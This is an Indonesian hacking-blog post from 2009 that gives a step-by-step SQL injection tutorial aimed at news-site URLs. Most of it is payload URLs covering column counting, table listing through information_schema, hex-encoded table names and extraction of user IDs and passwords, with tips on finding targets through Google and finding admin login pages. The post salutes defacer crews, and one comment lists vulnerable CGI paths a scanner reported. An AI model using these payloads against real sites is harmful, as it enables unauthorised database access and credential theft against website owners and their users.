Cari
Menu
Kategori
Song kesukaan gw [1]
Lagu favorit gw xixixixi
All About Hacking [5]
hacking tutor, tehnik, sqli, bugs, shell ,tools etc
Programming [1]
Semua Jenis Pemograman, Visual Basic, HTML, Pyton, Perl, Mysql, Javascript, PHP, C , Assembly, etc
Devils Tools [0]
hacking tools...
Unik... [2]
Segala thread unik di sini
Statistik

Total online: 1
Pengintai : 1
My friend 0
Masuk
Minggu, 02.02.2025, 8:45 AM
Hellcome Guest

Ze3 n0te

Main » 2009 » September » 14 » Blind SQL Injection Oleh Selalu_ngantuk
8:55 PM
Blind SQL Injection Oleh Selalu_ngantuk
biggrin

Blind SQL Injection Oleh Selalu_ngantuk

sepintas tekhnik ini sama dengan tekhnik SQL pada umumnya...
Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --

###################
## +step Satu+ ##
###################
carilah target
salah satunya menggunakan search engine pada google !!
sebagai penjelasan klik disini

misal: [site]/berita.php?id=

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100

###################
## +step dua+ ##
###################
mencari dan menghitung jumlah table yang ada dalam databasenya...
seperti yang kita ketahui bersama pada SQL injection untuk menghitung jumlah table pada databasenya
menggunakan perintah : order by
contoh :
[site]/berita.php?id=-12 order by 1--
[site]/berita.php?id=-12 order by 2--

hingga muncul pesan error...

*namun untuk kasus tertentu order by tidak dapat digunakan ...
pada blind SQL kita dapat mengetahui jumlah table yang ada dengan cara Melakukan column count !!!

contoh melakuan column count :
union select diikuti dengan angka.

maka: [site]/berita.php?id= union select 1/*
maka: [site]/berita.php?id= union select 1,2/*
maka: [site]/berita.php?id= union select 1,2,3/*

hingga keluar angka pada tampilan web target

anggap yang keluar sampai angka 9
ok angka yg keluar angka 9 dan 2

###################
## +step tiga+ ##
###################

menampilkan table...
pada SQL injection untuk menampilkan table adalah memasukkan perintah group_concat(table_name) pada angka yg keluar tadi
dan perintah +from+information_schema.tables+where+table_schema=database() setelah angka terakhir

contoh :
[site]/berita.php?id=-12+union+select+1,2,3,4,group_concat(table_name),6,7,8+from

+information_schema.tables+where+table_schema=database()--

jika gagal kita dapat mengganti querynya
query yang kita gunakan adalah : union select table_name from information_schema.tables where table_schema=database() limit 0,1
masukan "table_name" pada angka yang keluar (9 atau 2) diikuti "from information_schema.tables where table_schema=database() limit 0,1"
menjadi , [site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 0,1/*

disini saya menggunakan 2.

####################
## +step empat+ ##
####################

mengeluarkan table_name yang lain.
untuk mengeluarkan table_name yang lain ganti nilai limit menjadi , 1,1 , 2,1 , 3,1 ....
hingga mendapatkan table yang kita inginkan !!!

contoh:
[site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 1,1/*
[site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 2,1/*
[site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 3,1/*

dan contoh hasilnya :
1,1 : aktual_berita
2,1 : aktual_kategori
3,1 : berita
4,1 : category
5,1 : iklan
10,1: user

dan tabel yang kita butuhkan ada pada limit 10,1 ( user )

###################
## +step lima+ ##
###################
ada tahap ini kamu wajib mengekstrax kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://ascii-convert.tk/

kata user menjadi : 75736572
maka :
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=user limit 0,1/*
menjadi
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=0x75736572 limit 0,1/*

untuk mengetahui isi pada table user anda dapat mengganti nilai limit :
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=0x75736572 limit 0,1/*
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=0x75736572 limit 1,1/*

dan hasilnya :
0,1 : userid
1,1 : password
1,2 : description
1,3 : auth

* Setiap bilangan hexa harus di tambah 0x
contoh : bilangan hexa dari indonesiacoder = 696E646F6E65736961636F646572
bila di gunakan akan menjadi = 0x696E646F6E65736961636F646572

###################
## +step enam+ ##
###################
mengeluarkan field .
query yang kita gunakan adalah : UNION SELECT column_name FROM table_name

column_name :userid, password
table_name :user

masukan column_name pada angka yang keluar kemudian FROM table_name
menjadi,
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from table_name/*

contoh
[site]/berita.php?id=-12 union select 1,password,3,4,5,6,7,8,9 from user/*

* Mengunakan Concatenation
Concatenation adalah kondisi dimana kamu ingin mengeluarkan field dengan banyak colomn_name atau karna kurangnya angka yang keluar saat blind union. untuk string Concatenation pada mysql adalah CONCAT(A,B,C,...)

contoh:
kondisi kurangnya angka yang keluar saat blind union.
column_name : userid, password, description
table_name :user
angka yang keluar: 2 dan 9

bagaimana kita mengeluarkan field dengan 3 column_name sedangkan angka yang keluar hanya 2 (2 dan 9), jawabanya menggunakan concat() tadi.
contoh :
[site]/berita.php?id=-12 union select 1,concat(0x3C3D3E,userid,0x3a,password,0x3a,description,0x3C3D3E),3,4,5,6,7,8,9 from user/*

###################
## +step enam+ ##
###################
tahap terakhir mencari halaman admin atau login

anda dapat menggunakan software intellitamper
http://www.brothersoft.com/intellitamper-download-10958.html <== DOWNLOAD INTELLITAMPER

atau menggunakan jasa http://www.file2hd.com/

<++DOWNLOAD VIDEO++>

mohon maaf jika ada kesalahan atau kekurangan dalam tutorial saya...

Terima kasihku untuk Allah.swt , Muhammad.saw , Seluruh Keluarga besar ku dan ALL DEFACER INDONESIA .

..:: VIVA INDONESIA HACKING ::..

Greatz : Paman / Jack , X-shadow , Gonzhack , Dontukulesto , D3viln3t , M364TR0N , Cyb3R_tr0n , bayu5154 , tucker , petrucii , M3NW5 , Mr.Joker , #00000

Spesial thanks to : INDONESIACODER CREW , DEFACER.BIZ CREW , PAGUNCODING CREW and all member cyberdos
Category: All About Hacking | Views: 1544 | Added by: o0n_sangaD | Tags: SQLi, hacking tehnik | Rating: 0.0/0
Total comments: 2
2 jimmyxxx  
0
Hole found: admnlogin
Hole found: aglimpse
Hole found: AnForm2
Hole found: AnyForm2
Hole found: archie
Hole found: Auth
Hole found: aux check
Hole found: Boa?? 8-)
Hole found: calendar
Hole found: campas
Hole found: CGI Counter
Hole found: cgi/cgiproc
Hole found: cgiwrap
Hole found: com1 check
Hole found: com2 check
Hole found: com3 check
Hole found: con check
Hole found: con/con check
Hole found: DataBase/
Hole found: ews
Hole found: excite
Hole found: Fax Survey
Hole found: Finger
Hole found: Finger1
Hole found: glimpse
Hole found: Handler
Hole found: HTML Script
Hole found: htmldocs
Hole found: htsearch
Hole found: icat
Hole found: iisadmin dir
Hole found: info2www
Hole found: log
Hole found: logs
Hole found: lpt check
Hole found: lwgate
Hole found: LWGate
Hole found: MachineInfo
Hole found: MachineInfo
Hole found: nph-publish
Hole found: nph-test-cgi
Hole found: passwd
Hole found: password
Hole found: pfdisplay
Hole found: PHF
Hole found: php
Hole found: plusmail
Hole found: post_query
Hole found: printenv
Hole found: publisher
Hole found: query
Hole found: redirect
Hole found: rmp_query
Hole found: root
Hole found: rpm_query hmm?
Hole found: scripts list
Hole found: scrp perl?
Hole found: search
Hole found: session
Hole found: srchadm
Hole found: stats
Hole found: statsconfig
Hole found: status
Hole found: Test-CGI
Hole found: tpgnrock
Hole found: view-source
Hole found: view-sousce

1 senot  
0
mantep .... nice share :D

Only registered users can add comments.
[ Registrasi | Masuk ]
Status YM
Calendar
«  September 2009  »
SuMoTuWeThFrSa
  12345
6789101112
13141516171819
20212223242526
27282930
Entries archive
My Allied
  • vYc0d
  • v4lc0m87
  • Chaer.Newbie
  • zzz-01
  • Black_Flag
  • Irdhi Topan
  • Rede BlackHat
  • Sarukusai
  • astroboyyy
  • [*]vir0e5
  • My Community
  • Jasakom Community
  • Cyberdos Underground
  • devilsc0de
  • My Other site
  • T1ku5-j4r1n93n
  • babux-electronix